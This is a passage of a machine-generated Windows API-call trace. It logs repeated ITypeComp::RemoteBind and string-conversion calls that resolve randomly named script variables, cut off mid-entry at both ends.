ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f2) returned 0x0 [0060.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2fae, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="dtsMAQE") returned 8 [0060.512] ITypeComp:RemoteBind (in: This=0x87cef08, szName="dtsMAQE", lHashVal=0x1082b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f2) returned 0x0 [0060.512] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.513] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x8, _Src=0x56f2fae | out: _Dst=0x87fc6e0) returned 0x0 [0060.513] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc225a, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_dtsMAQE") returned 15 [0060.513] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_dtsMAQE", lHashVal=0x1076b8, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.513] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f2fae | out: _Dst=0x345c9c) returned 0x0 [0060.513] CRetailMalloc_Free () returned 0x6c80301 [0060.513] ITypeComp:RemoteBind (in: This=0x87ce890, szName="zwqd4g3s", lHashVal=0x10bf7d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f4) returned 0x0 [0060.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2fd2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="zwqd4g3s") returned 9 [0060.514] ITypeComp:RemoteBind (in: This=0x87ce668, szName="zwqd4g3s", lHashVal=0x10bf7d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f4) returned 0x0 [0060.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2fd2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="zwqd4g3s") returned 9 [0060.514] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="zwqd4g3s", lHashVal=0x10bf7d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f4) returned 0x0 [0060.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2fd2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="zwqd4g3s") returned 9 [0060.514] ITypeComp:RemoteBind (in: This=0x87cef08, szName="zwqd4g3s", lHashVal=0x10bf7d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f4) returned 0x0 [0060.515] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.515] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x9, _Src=0x56f2fd2 | out: _Dst=0x87fc6e0) returned 0x0 [0060.515] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2286, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_zwqd4g3s") returned 16 [0060.515] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_zwqd4g3s", lHashVal=0x109706, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.515] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f2fd2 | out: _Dst=0x345c9c) returned 0x0 [0060.515] CRetailMalloc_Free () returned 0x6c80301 [0060.516] ITypeComp:RemoteBind (in: This=0x87ce890, szName="ysXNVyjre", lHashVal=0x10a69d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f6) returned 0x0 [0060.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570001a, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="ysXNVyjre") returned 10 [0060.516] ITypeComp:RemoteBind (in: This=0x87ce668, szName="ysXNVyjre", lHashVal=0x10a69d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f6) returned 0x0 [0060.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570001a, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="ysXNVyjre") returned 10 [0060.516] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="ysXNVyjre", lHashVal=0x10a69d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f6) returned 0x0 [0060.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570001a, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="ysXNVyjre") returned 10 [0060.517] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ysXNVyjre", lHashVal=0x10a69d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f6) returned 0x0 [0060.517] CRetailMalloc_Alloc () returned 0x874fba0 [0060.517] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x570001a | out: _Dst=0x874fba0) returned 0x0 [0060.517] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc22b2, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_ysXNVyjre") returned 17 [0060.517] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ysXNVyjre", lHashVal=0x10afe2, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.517] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x570001a | out: _Dst=0x345c9c) returned 0x0 [0060.517] CRetailMalloc_Free () returned 0x5d60401 [0060.518] ITypeComp:RemoteBind (in: This=0x87ce890, szName="wcb6Yu2K0", lHashVal=0x101566, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f8) returned 0x0 [0060.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700042, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="wcb6Yu2K0") returned 10 [0060.518] ITypeComp:RemoteBind (in: This=0x87ce668, szName="wcb6Yu2K0", lHashVal=0x101566, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f8) returned 0x0 [0060.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700042, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="wcb6Yu2K0") returned 10 [0060.518] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="wcb6Yu2K0", lHashVal=0x101566, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f8) returned 0x0 [0060.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700042, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="wcb6Yu2K0") returned 10 [0060.519] ITypeComp:RemoteBind (in: This=0x87cef08, szName="wcb6Yu2K0", lHashVal=0x101566, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f8) returned 0x0 [0060.519] CRetailMalloc_Alloc () returned 0x874fba0 [0060.519] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700042 | out: _Dst=0x874fba0) returned 0x0 [0060.519] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc22e2, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_wcb6Yu2K0") returned 17 [0060.519] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_wcb6Yu2K0", lHashVal=0x100f2a, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.519] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700042 | out: _Dst=0x345c9c) returned 0x0 [0060.519] CRetailMalloc_Free () returned 0x5d60401 [0060.520] ITypeComp:RemoteBind (in: This=0x87ce890, szName="MXq9oUCOj", lHashVal=0x1011a9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11fa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11fa) returned 0x0 [0060.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570006a, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="MXq9oUCOj") returned 10 [0060.520] ITypeComp:RemoteBind (in: This=0x87ce668, szName="MXq9oUCOj", lHashVal=0x1011a9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11fa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11fa) returned 0x0 [0060.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570006a, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="MXq9oUCOj") returned 10 [0060.520] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="MXq9oUCOj", lHashVal=0x1011a9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11fa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11fa) returned 0x0 [0060.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570006a, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="MXq9oUCOj") returned 10 [0060.521] ITypeComp:RemoteBind (in: This=0x87cef08, szName="MXq9oUCOj", lHashVal=0x1011a9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11fa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11fa) returned 0x0 [0060.521] CRetailMalloc_Alloc () returned 0x874fba0 [0060.521] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x570006a | out: _Dst=0x874fba0) returned 0x0 [0060.521] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2312, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_MXq9oUCOj") returned 17 [0060.521] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_MXq9oUCOj", lHashVal=0x101aee, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.521] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x570006a | out: _Dst=0x345c9c) returned 0x0 [0060.522] CRetailMalloc_Free () returned 0x5d60401 [0060.522] ITypeComp:RemoteBind (in: This=0x87ce890, szName="z9gpznkiU", lHashVal=0x1003b8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11fc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11fc) returned 0x0 [0060.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700092, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="z9gpznkiU") returned 10 [0060.522] ITypeComp:RemoteBind (in: This=0x87ce668, szName="z9gpznkiU", lHashVal=0x1003b8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11fc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11fc) returned 0x0 [0060.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700092, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="z9gpznkiU") returned 10 [0060.522] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="z9gpznkiU", lHashVal=0x1003b8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11fc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11fc) returned 0x0 [0060.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700092, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="z9gpznkiU") returned 10 [0060.523] ITypeComp:RemoteBind (in: This=0x87cef08, szName="z9gpznkiU", lHashVal=0x1003b8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11fc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11fc) returned 0x0 [0060.523] CRetailMalloc_Alloc () returned 0x874fba0 [0060.523] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700092 | out: _Dst=0x874fba0) returned 0x0 [0060.523] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2342, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_z9gpznkiU") returned 17 [0060.524] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_z9gpznkiU", lHashVal=0x100cfd, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.524] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700092 | out: _Dst=0x345c9c) returned 0x0 [0060.524] CRetailMalloc_Free () returned 0x5d60401 [0060.524] ITypeComp:RemoteBind (in: This=0x87ce890, szName="tzETxUbP", lHashVal=0x10e216, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11fe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11fe) returned 0x0 [0060.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57000ba, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="tzETxUbP") returned 9 [0060.524] ITypeComp:RemoteBind (in: This=0x87ce668, szName="tzETxUbP", lHashVal=0x10e216, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11fe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11fe) returned 0x0 [0060.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57000ba, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="tzETxUbP") returned 9 [0060.524] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="tzETxUbP", lHashVal=0x10e216, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11fe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11fe) returned 0x0 [0060.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57000ba, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="tzETxUbP") returned 9 [0060.525] ITypeComp:RemoteBind (in: This=0x87cef08, szName="tzETxUbP", lHashVal=0x10e216, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11fe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11fe) returned 0x0 [0060.525] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.525] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x9, _Src=0x57000ba | out: _Dst=0x87fc6e0) returned 0x0 [0060.525] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2372, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_tzETxUbP") returned 16 [0060.526] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_tzETxUbP", lHashVal=0x10b99f, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.526] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x57000ba | out: _Dst=0x345c9c) returned 0x0 [0060.526] CRetailMalloc_Free () returned 0x6c80301 [0060.526] ITypeComp:RemoteBind (in: This=0x87ce890, szName="KXbQEg", lHashVal=0x10710e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x1200 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x1200) returned 0x0 [0060.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57000e2, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="KXbQEg") returned 7 [0060.527] ITypeComp:RemoteBind (in: This=0x87ce668, szName="KXbQEg", lHashVal=0x10710e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x1200 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x1200) returned 0x0 [0060.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57000e2, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="KXbQEg") returned 7 [0060.527] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="KXbQEg", lHashVal=0x10710e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x1200 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x1200) returned 0x0 [0060.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57000e2, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="KXbQEg") returned 7 [0060.528] ITypeComp:RemoteBind (in: This=0x87cef08, szName="KXbQEg", lHashVal=0x10710e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x1200 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x1200) returned 0x0 [0060.528] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.528] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x7, _Src=0x57000e2 | out: _Dst=0x87fc6e0) returned 0x0 [0060.528] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc239e, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_KXbQEg") returned 14 [0060.528] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_KXbQEg", lHashVal=0x10ebb7, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.529] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x57000e2 | out: _Dst=0x345c9c) returned 0x0 [0060.529] CRetailMalloc_Free () returned 0x6c80301 [0060.529] ITypeComp:RemoteBind (in: This=0x87ce890, szName="oFy1j", lHashVal=0x1055cc, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x1202 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x1202) returned 0x0 [0060.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700106, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="oFy1j") returned 6 [0060.529] ITypeComp:RemoteBind (in: This=0x87ce668, szName="oFy1j", lHashVal=0x1055cc, wFlags=0x5, 